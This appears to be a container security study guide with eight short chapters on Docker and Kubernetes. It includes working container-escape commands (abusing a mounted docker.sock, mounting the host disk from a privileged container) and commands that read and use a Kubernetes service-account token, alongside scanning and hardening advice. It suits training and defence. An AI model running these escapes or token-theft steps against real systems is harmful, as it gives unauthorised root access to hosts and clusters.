Chapter 1 โ Container Security Concepts
Containers share the host kernel โ they are isolated via namespaces and cgroups, not virtualisation. A container escape equals code execution on the host. Understanding this boundary is the foundation of container security.
Chapter 2 โ Docker Architecture & Attack Surface
# Check if you are in a container
cat /proc/1/cgroup # contains "docker" if containerised
ls /.dockerenv # present in Docker containers
# Check capabilities (excessive caps = escape vector)
capsh --print
cat /proc/self/status | grep Cap
Chapter 3 โ Docker Socket Abuse
# If docker.sock is mounted in the container
ls /var/run/docker.sock
# Escape via mounted socket
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt sh
# You now have root on the host
Chapter 4 โ Container Escapes
# Check if privileged
cat /proc/self/status | grep CapEff
# fdbb = full capabilities = privileged mode
# Mount host filesystem from privileged container
mkdir /tmp/host && mount /dev/sda1 /tmp/host
chroot /tmp/host
# CAP_SYS_ADMIN escape via cgroup release_agent (see Docker Container Escape lab)
Chapter 5 โ Image Security Analysis
# Analyse image layers for secrets
dive IMAGE_NAME
# Scan for CVEs
trivy image nginx:latest
# Check image history for exposed secrets
docker history IMAGE --no-trunc
# Extract filesystem from image
docker save IMAGE | tar -xvf -
Chapter 6 โ Kubernetes Security Basics
# Check RBAC permissions
kubectl auth can-i --list
# Access K8s API from inside a pod using the service account token
cat /var/run/secrets/kubernetes.io/serviceaccount/token
curl -k https://kubernetes.default.svc/api/v1/namespaces -H "Authorization: Bearer TOKEN"
Chapter 7 โ Container Runtime Security
Falco monitors container syscalls in real-time and alerts on suspicious behaviour: spawning shells, reading /etc/shadow, mounting sensitive directories, unexpected network connections from containers. Deploy it as the IDS for your container environment.
Chapter 8 โ Secure Containerisation
Never run as root. Use read-only filesystems. Drop all capabilities and add only what is needed. Never mount the Docker socket into containers. Use distroless base images. Scan images in CI/CD. Set resource limits. Use network policies in Kubernetes. Regularly rotate and pin image digests.